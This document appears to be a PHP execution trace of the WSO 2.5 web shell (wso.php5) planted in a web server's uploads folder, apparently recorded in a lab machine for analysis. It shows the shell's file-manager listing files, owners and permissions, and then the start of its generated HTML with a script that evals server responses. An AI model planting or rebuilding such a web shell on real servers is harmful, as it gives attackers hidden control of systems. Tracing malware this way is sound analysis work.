3	125	0	0.010383	896160	is_link	0		/var/www/html/uploads/wso.php5	670	1	'/var/www/html/uploads/data'
3	125	1	0.010397	896200
3	125	R			FALSE
3	126	0	0.010410	896160	is_dir	0		/var/www/html/uploads/wso.php5	672	1	'/var/www/html/uploads/data'
3	126	1	0.010423	896200
3	126	R			TRUE
3	127	0	0.010435	896104	array_merge	0		/var/www/html/uploads/wso.php5	673	2	['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']	['type' => 'dir']
3	127	1	0.010459	896544
3	127	R			['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2		A						/var/www/html/uploads/wso.php5	673	$dirs[] = ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
2		A						/var/www/html/uploads/wso.php5	657	$i++
3	128	0	0.010516	896480	fileowner	0		/var/www/html/uploads/wso.php5	658	1	'prepend.php'
3	128	1	0.010530	896504
3	128	R			0
3	129	0	0.010543	896464	posix_getpwuid	0		/var/www/html/uploads/wso.php5	658	1	0
3	129	1	0.010565	897264
3	129	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/wso.php5	658	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3	130	0	0.010605	896496	filegroup	0		/var/www/html/uploads/wso.php5	659	1	'prepend.php'
3	130	1	0.010618	896536
3	130	R			0
3	131	0	0.010630	896496	posix_getgrgid	0		/var/www/html/uploads/wso.php5	659	1	0
3	131	1	0.010650	897152
3	131	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2		A						/var/www/html/uploads/wso.php5	659	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3	132	0	0.010684	897032	filemtime	0		/var/www/html/uploads/wso.php5	662	1	'/var/www/html/uploads/prepend.php'
3	132	1	0.010700	897096
3	132	R			1676262802
3	133	0	0.010713	896992	date	0		/var/www/html/uploads/wso.php5	662	2	'Y-m-d H:i:s'	1676262802
3	133	1	0.010744	897320
3	133	R			'2023-02-12 23:33:22'
3	134	0	0.010758	897312	wsoPermsColor	1		/var/www/html/uploads/wso.php5	663	1	'/var/www/html/uploads/prepend.php'
4	135	0	0.010771	897312	is_readable	0		/var/www/html/uploads/wso.php5	369	1	'/var/www/html/uploads/prepend.php'
4	135	1	0.010787	897352
4	135	R			TRUE
4	136	0	0.010800	897312	is_writable	0		/var/www/html/uploads/wso.php5	371	1	'/var/www/html/uploads/prepend.php'
4	136	1	0.010816	897352
4	136	R			FALSE
4	137	0	0.010829	897312	fileperms	0		/var/www/html/uploads/wso.php5	372	1	'/var/www/html/uploads/prepend.php'
4	137	1	0.010843	897352
4	137	R			33261
4	138	0	0.010855	897312	wsoPerms	1		/var/www/html/uploads/wso.php5	372	1	33261
4		A						/var/www/html/uploads/wso.php5	350	$i = '-'
4		A						/var/www/html/uploads/wso.php5	356	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	357	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	358	$i .= 'x'
4		A						/var/www/html/uploads/wso.php5	359	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	360	$i .= '-'
4		A						/var/www/html/uploads/wso.php5	361	$i .= 'x'
4		A						/var/www/html/uploads/wso.php5	362	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	363	$i .= '-'
4		A						/var/www/html/uploads/wso.php5	364	$i .= 'x'
4	138	1	0.010963	897352
4	138	R			'-rwxr-xr-x'
3	134	1	0.010977	897376
3	134	R			'<font color=white>-rwxr-xr-x</font>'
3	139	0	0.010993	897376	filesize	0		/var/www/html/uploads/wso.php5	664	1	'/var/www/html/uploads/prepend.php'
3	139	1	0.011006	897416
3	139	R			57
2		A						/var/www/html/uploads/wso.php5	666	$tmp = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root']
3	140	0	0.011044	897000	is_file	0		/var/www/html/uploads/wso.php5	668	1	'/var/www/html/uploads/prepend.php'
3	140	1	0.011058	897040
3	140	R			TRUE
3	141	0	0.011071	896936	array_merge	0		/var/www/html/uploads/wso.php5	669	2	['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root']	['type' => 'file']
3	141	1	0.011094	897376
3	141	R			['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2		A						/var/www/html/uploads/wso.php5	669	$files[] = ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
2		A						/var/www/html/uploads/wso.php5	657	$i++
3	142	0	0.011151	897312	fileowner	0		/var/www/html/uploads/wso.php5	658	1	'wso.php5'
3	142	1	0.011166	897328
3	142	R			1000
3	143	0	0.011179	897288	posix_getpwuid	0		/var/www/html/uploads/wso.php5	658	1	1000
3	143	1	0.011209	898104
3	143	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2		A						/var/www/html/uploads/wso.php5	658	$ow = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3	144	0	0.011251	897336	filegroup	0		/var/www/html/uploads/wso.php5	659	1	'wso.php5'
3	144	1	0.011264	897376
3	144	R			1000
3	145	0	0.011277	897336	posix_getgrgid	0		/var/www/html/uploads/wso.php5	659	1	1000
3	145	1	0.011307	897992
3	145	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2		A						/var/www/html/uploads/wso.php5	659	$gr = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3	146	0	0.011342	897856	filemtime	0		/var/www/html/uploads/wso.php5	662	1	'/var/www/html/uploads/wso.php5'
3	146	1	0.011358	897912
3	146	R			1676262802
3	147	0	0.011371	897816	date	0		/var/www/html/uploads/wso.php5	662	2	'Y-m-d H:i:s'	1676262802
3	147	1	0.011402	898144
3	147	R			'2023-02-12 23:33:22'
3	148	0	0.011416	898128	wsoPermsColor	1		/var/www/html/uploads/wso.php5	663	1	'/var/www/html/uploads/wso.php5'
4	149	0	0.011429	898128	is_readable	0		/var/www/html/uploads/wso.php5	369	1	'/var/www/html/uploads/wso.php5'
4	149	1	0.011444	898168
4	149	R			TRUE
4	150	0	0.011457	898128	is_writable	0		/var/www/html/uploads/wso.php5	371	1	'/var/www/html/uploads/wso.php5'
4	150	1	0.011471	898168
4	150	R			FALSE
4	151	0	0.011484	898128	fileperms	0		/var/www/html/uploads/wso.php5	372	1	'/var/www/html/uploads/wso.php5'
4	151	1	0.011497	898168
4	151	R			33204
4	152	0	0.011509	898128	wsoPerms	1		/var/www/html/uploads/wso.php5	372	1	33204
4		A						/var/www/html/uploads/wso.php5	350	$i = '-'
4		A						/var/www/html/uploads/wso.php5	356	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	357	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	358	$i .= '-'
4		A						/var/www/html/uploads/wso.php5	359	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	360	$i .= 'w'
4		A						/var/www/html/uploads/wso.php5	361	$i .= '-'
4		A						/var/www/html/uploads/wso.php5	362	$i .= 'r'
4		A						/var/www/html/uploads/wso.php5	363	$i .= '-'
4		A						/var/www/html/uploads/wso.php5	364	$i .= '-'
4	152	1	0.011616	898168
4	152	R			'-rw-rw-r--'
3	148	1	0.011630	898192
3	148	R			'<font color=white>-rw-rw-r--</font>'
3	153	0	0.011646	898192	filesize	0		/var/www/html/uploads/wso.php5	664	1	'/var/www/html/uploads/wso.php5'
3	153	1	0.011659	898232
3	153	R			66134
2		A						/var/www/html/uploads/wso.php5	666	$tmp = ['name' => 'wso.php5', 'path' => '/var/www/html/uploads/wso.php5', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes']
3	154	0	0.011694	897816	is_file	0		/var/www/html/uploads/wso.php5	668	1	'/var/www/html/uploads/wso.php5'
3	154	1	0.011707	897856
3	154	R			TRUE
3	155	0	0.011720	897760	array_merge	0		/var/www/html/uploads/wso.php5	669	2	['name' => 'wso.php5', 'path' => '/var/www/html/uploads/wso.php5', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes']	['type' => 'file']
3	155	1	0.011743	898200
3	155	R			['name' => 'wso.php5', 'path' => '/var/www/html/uploads/wso.php5', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
2		A						/var/www/html/uploads/wso.php5	669	$files[] = ['name' => 'wso.php5', 'path' => '/var/www/html/uploads/wso.php5', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
2		A						/var/www/html/uploads/wso.php5	657	$i++
2		A						/var/www/html/uploads/wso.php5	675	GLOBALS['sort'] = [0 => 'name', 1 => 1]
3	156	0	0.011821	898160	usort	0		/var/www/html/uploads/wso.php5	682	2	[0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 2 => ['name' => 'wso.php5', 'path' => '/var/www/html/uploads/wso.php5', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']]	'wsoCmp'
4	157	0	0.011857	898608	wsoCmp	1		/var/www/html/uploads/wso.php5	682	2	['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']	['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
5	158	0	0.011885	898608	strtolower	0		/var/www/html/uploads/wso.php5	678	1	'.htaccess'
5	158	1	0.011898	898640
5	158	R			'.htaccess'
5	159	0	0.011913	898608	strtolower	0		/var/www/html/uploads/wso.php5	678	1	'prepend.php'
5	159	1	0.011925	898640
5	159	R			'prepend.php'
5	160	0	0.011939	898608	strcmp	0		/var/www/html/uploads/wso.php5	678	2	'.htaccess'	'prepend.php'
5	160	1	0.011952	898672
5	160	R			-1
4	157	1	0.011965	898608
4	157	R			-1
4	161	0	0.011978	898608	wsoCmp	1		/var/www/html/uploads/wso.php5	682	2	['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file']	['name' => 'wso.php5', 'path' => '/var/www/html/uploads/wso.php5', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
5	162	0	0.012006	898608	strtolower	0		/var/www/html/uploads/wso.php5	678	1	'prepend.php'
5	162	1	0.012018	898640
5	162	R			'prepend.php'
5	163	0	0.012032	898608	strtolower	0		/var/www/html/uploads/wso.php5	678	1	'wso.php5'
5	163	1	0.012044	898640
5	163	R			'wso.php5'
5	164	0	0.012057	898608	strcmp	0		/var/www/html/uploads/wso.php5	678	2	'prepend.php'	'wso.php5'
5	164	1	0.012070	898672
5	164	R			-1
4	161	1	0.012083	898608
4	161	R			-1
3	156	1	0.012096	898232
3	156	R			TRUE
3	165	0	0.012108	898184	usort	0		/var/www/html/uploads/wso.php5	683	2	[0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']]	'wsoCmp'
4	166	0	0.012136	898632	wsoCmp	1		/var/www/html/uploads/wso.php5	683	2	['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']	['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
5	167	0	0.012194	898632	strtolower	0		/var/www/html/uploads/wso.php5	678	1	'..'
5	167	1	0.012207	898664
5	167	R			'..'
5	168	0	0.012220	898632	strtolower	0		/var/www/html/uploads/wso.php5	678	1	'data'
5	168	1	0.012232	898664
5	168	R			'data'
5	169	0	0.012245	898632	strcmp	0		/var/www/html/uploads/wso.php5	678	2	'..'	'data'
5	169	1	0.012257	898696
5	169	R			-3552051
4	166	1	0.012271	898632
4	166	R			-3552051
3	165	1	0.012284	898256
3	165	R			TRUE
3	170	0	0.012296	898184	array_merge	0		/var/www/html/uploads/wso.php5	684	2	[0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']]	[0 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 1 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 2 => ['name' => 'wso.php5', 'path' => '/var/www/html/uploads/wso.php5', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']]
3	170	1	0.012342	898624
3	170	R			[0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 3 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 4 => ['name' => 'wso.php5', 'path' => '/var/www/html/uploads/wso.php5', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']]
2		A						/var/www/html/uploads/wso.php5	684	$files = [0 => ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 1 => ['name' => 'data', 'path' => '/var/www/html/uploads/data', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir'], 2 => ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 3 => ['name' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rwxr-xr-x</font>', 'size' => 57, 'owner' => 'root', 'group' => 'root', 'type' => 'file'], 4 => ['name' => 'wso.php5', 'path' => '/var/www/html/uploads/wso.php5', 'modify' => '2023-02-12 23:33:22', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 66134, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']]
2		A						/var/www/html/uploads/wso.php5	685	$l = 0
3	171	0	0.012446	898264	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'..'
3	171	1	0.012459	898328
3	171	R			'..'
3	172	0	0.012474	898392	htmlspecialchars	0		/var/www/html/uploads/wso.php5	687	1	'..'
3	172	1	0.012488	898584
3	172	R			'..'
3	173	0	0.012503	898504	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'..'
3	173	1	0.012515	898568
3	173	R			'..'
3	174	0	0.012528	898632	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'..'
3	174	1	0.012540	898696
3	174	R			'..'
3	175	0	0.012553	898696	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'..'
3	175	1	0.012565	898760
3	175	R			'..'
2		A						/var/www/html/uploads/wso.php5	689	$l = 1
3	176	0	0.012589	898280	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'data'
3	176	1	0.012601	898344
3	176	R			'data'
3	177	0	0.012615	898392	htmlspecialchars	0		/var/www/html/uploads/wso.php5	687	1	'data'
3	177	1	0.012636	898584
3	177	R			'data'
3	178	0	0.012657	898504	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'data'
3	178	1	0.012669	898568
3	178	R			'data'
3	179	0	0.012683	898632	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'data'
3	179	1	0.012694	898696
3	179	R			'data'
3	180	0	0.012707	898696	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'data'
3	180	1	0.012719	898760
3	180	R			'data'
2		A						/var/www/html/uploads/wso.php5	689	$l = 0
3	181	0	0.012742	898264	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'.htaccess'
3	181	1	0.012755	898336
3	181	R			'.htaccess'
3	182	0	0.012769	898312	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'.htaccess'
3	182	1	0.012780	898384
3	182	R			'.htaccess'
3	183	0	0.012794	898392	htmlspecialchars	0		/var/www/html/uploads/wso.php5	687	1	'.htaccess'
3	183	1	0.012807	898584
3	183	R			'.htaccess'
3	184	0	0.012823	898376	wsoViewSize	1		/var/www/html/uploads/wso.php5	687	1	64
3	184	1	0.012837	898408
3	184	R			'64 B'
3	185	0	0.012851	898504	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'.htaccess'
3	185	1	0.012863	898576
3	185	R			'.htaccess'
3	186	0	0.012876	898632	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'.htaccess'
3	186	1	0.012888	898704
3	186	R			'.htaccess'
3	187	0	0.012901	898696	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'.htaccess'
3	187	1	0.012913	898768
3	187	R			'.htaccess'
3	188	0	0.012926	898696	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'.htaccess'
3	188	1	0.012941	898768
3	188	R			'.htaccess'
3	189	0	0.012956	898856	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'.htaccess'
3	189	1	0.012967	898928
3	189	R			'.htaccess'
2		A						/var/www/html/uploads/wso.php5	689	$l = 1
3	190	0	0.012992	898280	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'prepend.php'
3	190	1	0.013004	898352
3	190	R			'prepend.php'
3	191	0	0.013018	898344	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'prepend.php'
3	191	1	0.013030	898416
3	191	R			'prepend.php'
3	192	0	0.013044	898424	htmlspecialchars	0		/var/www/html/uploads/wso.php5	687	1	'prepend.php'
3	192	1	0.013057	898616
3	192	R			'prepend.php'
3	193	0	0.013071	898408	wsoViewSize	1		/var/www/html/uploads/wso.php5	687	1	57
3	193	1	0.013084	898440
3	193	R			'57 B'
3	194	0	0.013097	898504	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'prepend.php'
3	194	1	0.013109	898576
3	194	R			'prepend.php'
3	195	0	0.013122	898632	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'prepend.php'
3	195	1	0.013134	898704
3	195	R			'prepend.php'
3	196	0	0.013147	898696	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'prepend.php'
3	196	1	0.013160	898768
3	196	R			'prepend.php'
3	197	0	0.013172	898696	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'prepend.php'
3	197	1	0.013184	898768
3	197	R			'prepend.php'
3	198	0	0.013197	898856	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'prepend.php'
3	198	1	0.013208	898928
3	198	R			'prepend.php'
2		A						/var/www/html/uploads/wso.php5	689	$l = 0
3	199	0	0.013237	898264	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'wso.php5'
3	199	1	0.013250	898336
3	199	R			'wso.php5'
3	200	0	0.013263	898312	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'wso.php5'
3	200	1	0.013275	898384
3	200	R			'wso.php5'
3	201	0	0.013288	898392	htmlspecialchars	0		/var/www/html/uploads/wso.php5	687	1	'wso.php5'
3	201	1	0.013301	898584
3	201	R			'wso.php5'
3	202	0	0.013315	898376	wsoViewSize	1		/var/www/html/uploads/wso.php5	687	1	66134
4	203	0	0.013328	898376	sprintf	0		/var/www/html/uploads/wso.php5	342	2	'%1.2f'	64.583984375
4	203	1	0.013343	898760
4	203	R			'64.58'
3	202	1	0.013357	898416
3	202	R			'64.58 KB'
3	204	0	0.013371	898504	urlencode	0		/var/www/html/uploads/wso.php5	687	1	'wso.php5'
3	204	1	0.013384	898576
3	204	R			'wso.php5'
3	205	0	0.013397	898632	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'wso.php5'
3	205	1	0.013409	898704
3	205	R			'wso.php5'
3	206	0	0.013422	898696	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'wso.php5'
3	206	1	0.013434	898768
3	206	R			'wso.php5'
3	207	0	0.013447	898696	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'wso.php5'
3	207	1	0.013459	898768
3	207	R			'wso.php5'
3	208	0	0.013471	898856	urlencode	0		/var/www/html/uploads/wso.php5	688	1	'wso.php5'
3	208	1	0.013483	898928
3	208	R			'wso.php5'
2		A						/var/www/html/uploads/wso.php5	689	$l = 1
3	209	0	0.013507	898184	htmlspecialchars	0		/var/www/html/uploads/wso.php5	693	1	'/var/www/html/uploads/'
3	209	1	0.013521	898376
3	209	R			'/var/www/html/uploads/'
3	210	0	0.013536	898184	class_exists	0		/var/www/html/uploads/wso.php5	696	1	'ZipArchive'
3	210	1	0.013550	898224
3	210	R			FALSE
3	211	0	0.013565	898184	wsoFooter	1		/var/www/html/uploads/wso.php5	705	0
4	212	0	0.013577	898184	is_writable	0		/var/www/html/uploads/wso.php5	286	1	'/var/www/html/uploads/'
4	212	1	0.013594	898224
4	212	R			TRUE
3		A						/var/www/html/uploads/wso.php5	286	$is_writable = ' <font color=\'green\'>(Writeable)</font>'
4	213	0	0.013621	898184	htmlspecialchars	0		/var/www/html/uploads/wso.php5	291	1	'/var/www/html/uploads/'
4	213	1	0.013634	898376
4	213	R			'/var/www/html/uploads/'
3	211	1	0.013790	898184
2	26	1	0.013801	890984
			0.013835	809456
TRACE END   [2023-02-13 02:33:48.725431]


Generated HTML code

<html><head><meta http-equiv="Content-Type" content="text/html; charset=Windows-1251"><title>localhost - WSO 2.5</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: #df5 !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '/var/www/html/';
    var a_ = 'FilesMan'
    var charset_ = 'Windows-1251';
    var p1_ = '';
    var p2_ = '';
    var p3_ = '';
    var d = document;
	function set(a,c,p1,p2,p3,charset) {
		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
	}
	function g(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		d.mf.submit();
	}
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		var params = 'ajax=true';
		for(i=0;i<d.mf.elements.length;i++)
			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
		sr('/wso.php5', params);
	}
	function sr(url, params) {
		if (window.XMLHttpRequest)
			req = new XMLHttpRequest();
		else if (window.ActiveXObject)
			req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
	}
	function processReqChange() {
		if( (req.readyState == 4) )
			if(req.status == 200) {
				var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
				var arr=reg.exec(req.responseText);
				eval(arr[2].substr(0, arr[1]));
			} else alert('Request error!');
	}
</script>
</head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
<form method="post" name="mf" style="display:none;">
<input type="hidden" name="a">
<input type="hidden" name="c">
<input type="hidden" name="p1">
<input type="hidden" name="p2">
<input type="hidden" name="p3">
<input type="hidden" name="charset">
